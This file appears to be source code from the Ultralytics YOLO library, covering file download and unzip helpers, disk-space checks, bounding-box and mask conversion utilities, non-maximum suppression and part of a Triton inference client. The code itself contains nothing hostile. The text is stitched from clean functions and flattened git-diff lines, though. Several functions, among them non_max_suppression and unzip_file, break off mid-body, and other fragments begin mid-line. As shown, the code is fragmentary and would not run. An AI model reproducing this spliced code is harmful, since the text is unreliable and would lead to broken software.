        leading_line, _, _ = report.strip().partition("\n")  # only the first line is used
        gpu_count = int(leading_line)
    except (subprocess.CalledProcessError, FileNotFoundError, ValueError):
        gpu_count = 0  # assume no GPUs are available
    return gpu_count
def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")):
    """
    Deletes all ".DS_Store" files and "__MACOSX" directories under a specified directory.

    Args:
        path (str | Path): The directory path that is searched recursively.
        files_to_delete (tuple): The file or directory names to be deleted.

    Example:
        ```python
        from ultralytics.utils.downloads import delete_dsstore

        delete_dsstore("path/to/dir")
        ```

    Note:
        ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They
        are hidden system files and can cause issues when transferring files between different operating systems.
    """
    for file in files_to_delete:
        matches = list(Path(path).rglob(file))
        LOGGER.info(f"Deleting {file} files: {matches}")
        for f in matches:
            if f.is_dir() and not f.is_symlink():
                # '__MACOSX' is a directory: Path.unlink() raises on directories, so remove the whole tree
                shutil.rmtree(f)
            elif f.exists() or f.is_symlink():
                # Skip entries that vanished because an enclosing match was already removed
                f.unlink()
+ + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. 
def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True):
    """
    Check if there is sufficient disk space to download and store a file.

    The file size is taken from the 'Content-Length' header of a HEAD request. The check is best-effort: if the
    request fails, times out, returns an error status or reports an unusable size, space is assumed to be sufficient.

    Args:
        url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'.
        path (str | Path, optional): The path or drive to check the available free space on.
        sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5.
        hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True.

    Returns:
        (bool): True if there is sufficient disk space, False otherwise.

    Raises:
        MemoryError: If there is insufficient disk space and `hard` is True.
    """
    gib = 1 << 30  # bytes per GiB
    try:
        r = requests.head(url, timeout=10)  # bounded wait so an unresponsive server cannot hang the download
        if r.status_code >= 400:
            return True  # URL error, size unknown, default to True
        data = int(r.headers.get("Content-Length", 0)) / gib  # file size (GB)
    except Exception:
        return True  # requests issue or malformed header, default to True

    total, used, free = (x / gib for x in shutil.disk_usage(path))  # GB

    if data * sf < free:
        return True  # sufficient space

    # Insufficient space
    text = (
        f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, "
        f"Please free {data * sf - free:.1f} GB additional disk space and try again."
    )
    if hard:
        raise MemoryError(text)
    LOGGER.warning(text)
    return False
def safe_download(
    url,
    file=None,
    dir=None,
    unzip=True,
    delete=False,
    curl=False,
    retry=3,
    min_bytes=1e0,
    exist_ok=False,
    progress=True,
):
    """
    Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file.

    Args:
        url (str): The URL of the file to be downloaded.
        file (str, optional): The filename of the downloaded file.
            If not provided, the file will be saved with the same name as the URL.
        dir (str | Path, optional): The directory to save the downloaded file.
            If not provided, the file will be saved in the current working directory.
        unzip (bool, optional): Whether to unzip the downloaded file. Default: True.
        delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False.
        curl (bool, optional): Whether to use curl command line tool for downloading. Default: False.
        retry (int, optional): The number of times to retry the download in case of failure. Default: 3.
        min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered
            a successful download. Default: 1E0.
        exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False.
        progress (bool, optional): Whether to display a progress bar during the download. Default: True.

    Returns:
        (Path): The directory the archive was extracted to when unzipping applies, otherwise the path of the
            downloaded (or already existing) file.

    Raises:
        ConnectionError: If the download fails while offline or after the retry limit is reached.

    Example:
        ```python
        from ultralytics.utils.downloads import safe_download

        link = "https://ultralytics.com/assets/bus.jpg"
        path = safe_download(link)
        ```
    """
    gdrive = url.startswith("https://drive.google.com/")  # check if the URL is a Google Drive link
    if gdrive:
        url, file = get_google_drive_file_info(url)

    f = Path(dir or ".") / (file or url2file(url))  # URL converted to filename
    if "://" not in str(url) and Path(url).is_file():  # URL exists ('://' check required in Windows Python<3.10)
        f = Path(url)  # filename
    elif not f.is_file():  # URL and file do not exist
        uri = (url if gdrive else clean_url(url)).replace(  # cleaned and aliased url
            "https://github.com/ultralytics/assets/releases/download/v0.0.0/",
            "https://ultralytics.com/assets/",  # assets alias
        )
        desc = f"Downloading {uri} to '{f}'"
        LOGGER.info(f"{desc}...")
        f.parent.mkdir(parents=True, exist_ok=True)  # make directory if missing
        check_disk_space(url, path=f.parent)
        for i in range(retry + 1):
            try:
                if curl or i > 0:  # curl download with retry, continue
                    s = "sS" * (not progress)  # silent
                    r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode
                    assert r == 0, f"Curl return value {r}"
                else:  # urllib download
                    method = "torch"
                    if method == "torch":
                        torch.hub.download_url_to_file(url, f, progress=progress)
                    else:
                        with request.urlopen(url) as response, TQDM(
                            total=int(response.getheader("Content-Length", 0)),
                            desc=desc,
                            disable=not progress,
                            unit="B",
                            unit_scale=True,
                            unit_divisor=1024,
                        ) as pbar:
                            with open(f, "wb") as f_opened:
                                for data in response:
                                    f_opened.write(data)
                                    pbar.update(len(data))

                if f.exists():
                    if f.stat().st_size > min_bytes:
                        break  # success
                    f.unlink()  # remove partial downloads
            except Exception as e:
                if i == 0 and not is_online():
                    raise ConnectionError(emojis(f"❌  Download failure for {uri}. Environment is not online.")) from e
                elif i >= retry:
                    raise ConnectionError(emojis(f"❌  Download failure for {uri}. Retry limit reached.")) from e
                LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...")

    if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}:
        from zipfile import is_zipfile

        # Path(...) so that a plain string `dir` works too; unzip to dir if provided else unzip in place
        unzip_dir = Path(dir or f.parent).resolve()
        if is_zipfile(f):
            unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress)  # unzip
        elif f.suffix in {".tar", ".gz"}:
            LOGGER.info(f"Unzipping {f} to {unzip_dir}...")
            subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True)
        if delete:
            f.unlink()  # remove zip
        return unzip_dir

    return f  # nothing to extract: hand back the file path, as the usage example expects
tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. 
def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False):
    """
    Download one or more URLs into a directory, optionally using a thread pool for concurrent downloads.

    Args:
        url (str | Path | list): A single URL or an iterable of URLs to download.
        dir (Path, optional): Destination directory, created if missing. Defaults to the working directory that
            was current when this module was imported (the default is evaluated once, at definition time).
        unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True.
        delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False.
        curl (bool, optional): Flag to use curl for downloading. Defaults to False.
        threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1.
        retry (int, optional): Number of retries in case of download failure. Defaults to 3.
        exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False.

    Example:
        ```python
        download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True)
        ```
    """
    dir = Path(dir)
    dir.mkdir(parents=True, exist_ok=True)  # make directory

    # Normalise to a list up front. Previously a single string combined with threads > 1 was zipped
    # character by character, so every character was handed to safe_download as if it were a URL.
    urls = [url] if isinstance(url, (str, Path)) else list(url)
    common = dict(dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok)

    if threads > 1:
        with ThreadPool(threads) as pool:
            # Progress bars are disabled for concurrent downloads; pool.map blocks until all are finished
            pool.map(lambda u: safe_download(url=u, progress=False, **common), urls)
    else:
        for u in urls:
            safe_download(url=u, **common)
def segment2box(segment, width=640, height=640):
    """
    Convert 1 segment label to 1 box label by clipping its points to the image, i.e. (xy1, xy2, ...) to (xyxy).

    Args:
        segment (np.ndarray): Segment points of shape (n, 2); the result is built with `np.array` using
            `segment.dtype`, so a NumPy array is expected.
        width (int): The width of the image. Defaults to 640.
        height (int): The height of the image. Defaults to 640.

    Returns:
        (np.ndarray): `[x_min, y_min, x_max, y_max]` of the clipped points, or four zeros when the segment is
            empty or every clipped x coordinate is zero.
    """
    x, y = segment.T  # segment xy
    x = x.clip(0, width)
    y = y.clip(0, height)
    # ndarray.any() is the vectorised equivalent of the builtin any(x), which iterated element by element
    if not x.any():
        return np.zeros(4, dtype=segment.dtype)
    return np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype)  # xyxy
def nms_rotated(boxes, scores, threshold=0.45):
    """
    NMS for oriented bounding boxes using probiou and fast-nms.

    Boxes are sorted by descending score and compared pairwise with `batch_probiou`. Only the strict upper
    triangle of the IoU matrix is kept, so each column holds the overlaps of one box with the boxes scored
    above it; a box is kept when the largest of those overlaps is below `threshold`.

    Args:
        boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr.
        scores (torch.Tensor): Confidence scores, shape (N,).
        threshold (float, optional): IoU threshold. Defaults to 0.45.

    Returns:
        (torch.Tensor): Indices of boxes to keep after NMS. For empty input this is an empty int64 tensor.
    """
    if len(boxes) == 0:
        # Return an index tensor like the non-empty path does; the former NumPy int8 array was neither a
        # tensor nor a dtype that torch accepts for indexing.
        return torch.empty((0,), dtype=torch.long, device=getattr(boxes, "device", None))
    sorted_idx = torch.argsort(scores, descending=True)
    boxes = boxes[sorted_idx]
    ious = batch_probiou(boxes, boxes).triu_(diagonal=1)  # overlaps with higher-scoring boxes only
    pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1)
    return sorted_idx[pick]
+ max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 
1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort 
def clip_boxes(boxes, shape):
    """
    Clamp xyxy boxes to the image rectangle, modifying `boxes` in place.

    Args:
        boxes (torch.Tensor | numpy.ndarray): Boxes whose last axis starts with (x1, y1, x2, y2).
        shape (tuple): Image size as (height, width, ...).

    Returns:
        (torch.Tensor | numpy.ndarray): The same `boxes` object with x limited to [0, width] and y to [0, height].
    """
    height, width = shape[0], shape[1]
    if isinstance(boxes, torch.Tensor):
        # One column at a time with out-of-place clamp (WARNING: inplace .clamp_() Apple MPS bug)
        for col, upper in enumerate((width, height, width, height)):  # x1, y1, x2, y2
            boxes[..., col] = boxes[..., col].clamp(0, upper)
        return boxes
    # np.array (faster grouped)
    x_cols, y_cols = [0, 2], [1, 3]
    boxes[..., x_cols] = boxes[..., x_cols].clip(0, width)  # x1, x2
    boxes[..., y_cols] = boxes[..., y_cols].clip(0, height)  # y1, y2
    return boxes


def clip_coords(coords, shape):
    """
    Clamp xy coordinates to the image rectangle, modifying `coords` in place.

    Args:
        coords (torch.Tensor | numpy.ndarray): Coordinates whose last axis starts with (x, y).
        shape (tuple): Image size as (height, width, ...).

    Returns:
        (torch.Tensor | numpy.ndarray): The same `coords` object with x limited to [0, width] and y to [0, height].
    """
    is_tensor = isinstance(coords, torch.Tensor)
    for axis, upper in ((0, shape[1]), (1, shape[0])):  # x against width, y against height
        column = coords[..., axis]
        # Tensors use out-of-place clamp (WARNING: inplace .clamp_() Apple MPS bug); arrays use clip
        coords[..., axis] = column.clamp(0, upper) if is_tensor else column.clip(0, upper)
    return coords
def xyxy2xywh(x):
    """
    Convert corner-format boxes (x1, y1, x2, y2) to center-format boxes (x, y, width, height), where (x1, y1) is
    the top-left corner and (x2, y2) is the bottom-right corner.

    Args:
        x (np.ndarray | torch.Tensor): Boxes in (x1, y1, x2, y2) format; the last dimension must be 4.

    Returns:
        y (np.ndarray | torch.Tensor): Boxes in (x, y, width, height) format, allocated with `empty_like`.
    """
    assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}"
    left, top, right, bottom = (x[..., k] for k in range(4))
    out = empty_like(x)  # faster than clone/copy
    out[..., 0] = (left + right) / 2  # x center
    out[..., 1] = (top + bottom) / 2  # y center
    out[..., 2] = right - left  # width
    out[..., 3] = bottom - top  # height
    return out
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
    """
    Convert normalized center-format boxes to pixel corner-format boxes, with an optional offset.

    Args:
        x (np.ndarray | torch.Tensor): Normalized boxes in (x, y, width, height) format; last dimension must be 4.
        w (int): Width of the image. Defaults to 640.
        h (int): Height of the image. Defaults to 640.
        padw (int): Offset added to both x coordinates. Defaults to 0.
        padh (int): Offset added to both y coordinates. Defaults to 0.

    Returns:
        y (np.ndarray | torch.Tensor): Boxes in [x1, y1, x2, y2] format where x1,y1 is the top-left corner and
            x2,y2 is the bottom-right corner, allocated with `empty_like`.
    """
    assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}"
    cx, cy, bw, bh = (x[..., k] for k in range(4))
    half_w = bw / 2
    half_h = bh / 2
    out = empty_like(x)  # faster than clone/copy
    out[..., 0] = w * (cx - half_w) + padw  # top left x
    out[..., 1] = h * (cy - half_h) + padh  # top left y
    out[..., 2] = w * (cx + half_w) + padw  # bottom right x
    out[..., 3] = h * (cy + half_h) + padh  # bottom right y
    return out
def xywh2ltwh(x):
    """
    Convert boxes from center format [x, y, w, h] to top-left format [x1, y1, w, h].

    Args:
        x (np.ndarray | torch.Tensor): Boxes in xywh format (center x, center y, width, height).

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with the first two columns replaced by the top-left
            corner; width and height are unchanged.
    """
    out = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
    out[..., :2] = x[..., :2] - x[..., 2:4] / 2  # center minus half size -> top left x, y
    return out


def xyxy2ltwh(x):
    """
    Convert boxes from corner format [x1, y1, x2, y2] to top-left format [x1, y1, w, h].

    Args:
        x (np.ndarray | torch.Tensor): Boxes in xyxy format, xy1=top-left, xy2=bottom-right.

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with columns 2 and 3 replaced by width and height.
    """
    out = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
    out[..., 2:4] = x[..., 2:4] - x[..., :2]  # bottom right minus top left -> width, height
    return out
def xyxyxyxy2xywhr(x):
    """
    Convert batched Oriented Bounding Boxes (OBB) from corner points [xy1, xy2, xy3, xy4] to [xywh, rotation].

    Each box is fitted with `cv2.minAreaRect`; the angle it reports in degrees is converted to radians.

    Args:
        x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8).

    Returns:
        (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). Tensor
            input yields a tensor with the input's device and dtype. An empty batch yields shape (0, 5).
    """
    is_torch = isinstance(x, torch.Tensor)
    if len(x) == 0:
        # reshape(0, -1, 2) cannot infer the -1 dimension for an empty array, so answer an empty batch directly
        return torch.zeros((0, 5), device=x.device, dtype=x.dtype) if is_torch else np.zeros((0, 5))
    points = x.cpu().numpy() if is_torch else x
    points = points.reshape(len(x), -1, 2)
    rboxes = []
    for pts in points:
        # NOTE: Use cv2.minAreaRect to get accurate xywhr,
        # especially some objects are cut off by augmentations in dataloader.
        (cx, cy), (w, h), angle = cv2.minAreaRect(pts)
        rboxes.append([cx, cy, w, h, angle / 180 * np.pi])  # degrees -> radians
    return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes)
def ltwh2xyxy(x):
    """
    Convert boxes from top-left format [x1, y1, w, h] to corner format [x1, y1, x2, y2].

    Args:
        x (np.ndarray | torch.Tensor): Boxes in ltwh format, xy1=top-left.

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with columns 2 and 3 replaced by the bottom-right
            corner (x2, y2).
    """
    out = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
    out[..., 2:4] = x[..., 2:4] + x[..., :2]  # size plus top left -> bottom right x, y
    return out


def segments2boxes(segments):
    """
    Convert segment labels to box labels, i.e. (xy1, xy2, ...) per segment to one xywh box per segment.

    Args:
        segments (list): Segments, each an array of shape (n, 2) holding x, y points.

    Returns:
        (np.ndarray): The xywh boxes enclosing each segment, produced by `xyxy2xywh`.
    """

    def _extent(points):
        """Return [x_min, y_min, x_max, y_max] of one segment."""
        xs, ys = points.T  # segment xy
        return [xs.min(), ys.min(), xs.max(), ys.max()]

    return xyxy2xywh(np.array([_extent(s) for s in segments]))  # xyxy -> xywh
def crop_mask(masks, boxes):
    """
    Zero out every mask pixel that lies outside the mask's bounding box.

    A pixel at column `c`, row `r` is kept when `x1 <= c < x2` and `y1 <= r < y2`.

    Args:
        masks (torch.Tensor): [n, h, w] tensor of masks.
        boxes (torch.Tensor): [n, 4] tensor of (x1, y1, x2, y2) box coordinates, in mask pixel units.

    Returns:
        (torch.Tensor): The masks multiplied by the inside-box indicator, shape [n, h, w].
    """
    _, height, width = masks.shape
    left, top, right, bottom = boxes[:, :, None].chunk(4, dim=1)  # each of shape(n,1,1)
    xs = torch.arange(width, device=masks.device, dtype=left.dtype)[None, None, :]  # shape(1,1,w)
    ys = torch.arange(height, device=masks.device, dtype=left.dtype)[None, :, None]  # shape(1,h,1)

    inside_x = (xs >= left) & (xs < right)
    inside_y = (ys >= top) & (ys < bottom)
    return masks * (inside_x & inside_y)
def process_mask_native(protos, masks_in, bboxes, shape):
    """
    Build binary instance masks from the mask head output, upsampling first and cropping to the boxes afterwards.

    Args:
        protos (torch.Tensor): Mask prototypes, [mask_dim, mask_h, mask_w].
        masks_in (torch.Tensor): Mask coefficients, [n, mask_dim], n is number of masks after nms.
        bboxes (torch.Tensor): Boxes, [n, 4], n is number of masks after nms.
        shape (tuple): The size of the input image (h,w).

    Returns:
        masks (torch.Tensor): Thresholded masks (values > 0.0 become 1), one per box, after `scale_masks` has
            resized them to `shape` and `crop_mask` has cleared everything outside each box.
    """
    channels, proto_h, proto_w = protos.shape  # CHW
    flat_protos = protos.float().view(channels, -1)
    logits = (masks_in @ flat_protos).view(-1, proto_h, proto_w)  # one map per detection
    resized = scale_masks(logits[None], shape)[0]  # CHW
    cropped = crop_mask(resized, bboxes)  # CHW
    return cropped.gt_(0.0)
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True):
    """
    Rescale segment coordinates (xy) from img1_shape to img0_shape, modifying `coords` in place.

    Args:
        img1_shape (tuple): (height, width) of the image the coords currently refer to. Only read when
            `ratio_pad` is None.
        coords (torch.Tensor | numpy.ndarray): Coordinates whose last axis starts with (x, y).
        img0_shape (tuple): (height, width) of the image the coords are mapped onto.
        ratio_pad (tuple): Optional precomputed values; `ratio_pad[0][0]` is used as the gain and `ratio_pad[1]`
            as the (x, y) padding. When None both are derived from the two shapes.
        normalize (bool): If True, the clipped coordinates are divided by the img0 width and height.
            Defaults to False.
        padding (bool): If True, the padding is subtracted before dividing by the gain. If False only the gain
            is applied.

    Returns:
        coords (torch.Tensor | numpy.ndarray): The scaled coordinates, clipped by `clip_coords`.
    """
    if ratio_pad is not None:
        gain, pad = ratio_pad[0][0], ratio_pad[1]
    else:  # calculate from img0_shape
        h1, w1 = img1_shape[0], img1_shape[1]
        h0, w0 = img0_shape[0], img0_shape[1]
        gain = min(h1 / h0, w1 / w0)  # gain = old / new
        pad = ((w1 - w0 * gain) / 2, (h1 - h0 * gain) / 2)  # wh padding

    if padding:
        for axis in (0, 1):  # x padding, then y padding
            coords[..., axis] -= pad[axis]
    for axis in (0, 1):
        coords[..., axis] /= gain
    coords = clip_coords(coords, img0_shape)
    if normalize:
        coords[..., 0] /= img0_shape[1]  # width
        coords[..., 1] /= img0_shape[0]  # height
    return coords
+ + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. 
+ """ + return (batch.permute(0, 2, 3, 1).contiguous() * 255).clamp(0, 255).to(torch.uint8).cpu().numpy() + + +def clean_str(s): + """ + Cleans a string by replacing special characters with '_' character. + + Args: + s (str): a string needing special characters replaced + + Returns: + (str): a string with special characters replaced by an underscore _ + """ + return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) + + +def empty_like(x): + """Creates empty torch.Tensor or np.ndarray with same shape as input and float32 dtype.""" + return ( + torch.empty_like(x, dtype=torch.float32) if isinstance(x, torch.Tensor) else np.empty_like(x, dtype=np.float32) + ) diff --git a/2024.ultralytics/v8.3.44/utils/triton.py b/2024.ultralytics/v8.3.44/utils/triton.py new file mode 100644 index 0000000..cc53ed5 --- /dev/null +++ b/2024.ultralytics/v8.3.44/utils/triton.py @@ -0,0 +1,93 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from typing import List +from urllib.parse import urlsplit + +import numpy as np + + +class TritonRemoteModel: + """ + Client for interacting with a remote Triton Inference Server model. + + Attributes: + endpoint (str): The name of the model on the Triton server. + url (str): The URL of the Triton server. + triton_client: The Triton client (either HTTP or gRPC). + InferInput: The input class for the Triton client. + InferRequestedOutput: The output request class for the Triton client. + input_formats (List[str]): The data types of the model inputs. + np_input_formats (List[type]): The numpy data types of the model inputs. + input_names (List[str]): The names of the model inputs. + output_names (List[str]): The names of the model outputs. + """ + + def __init__(self, url: str, endpoint: str = "", scheme: str = ""): + """ + Initialize the TritonRemoteModel. + + Arguments may be provided individually or parsed from a collective 'url' argument of the form + ://// + + Args: + url (str): The URL of the Triton server. 
+ endpoint (str): The name of the model on the Triton server. + scheme (str): The communication scheme ('http' or 'grpc'). + """ + if not endpoint and not scheme: # Parse all args from URL string + splits = urlsplit(url) + endpoint = splits.path.strip("/").split("/")[0] + scheme = splits.scheme + url = splits.netloc + + self.endpoint = endpoint + self.url = url + + # Choose the Triton client based on the communication scheme + if scheme == "http": + import tritonclient.http as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint) + else: + import tritonclient.grpc as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint, as_json=True)["config"] + + # Sort output names alphabetically, i.e. 'output0', 'output1', etc. + config["output"] = sorted(config["output"], key=lambda x: x.get("name")) + + # Define model attributes + type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8} + self.InferRequestedOutput = client.InferRequestedOutput + self.InferInput = client.InferInput + self.input_formats = 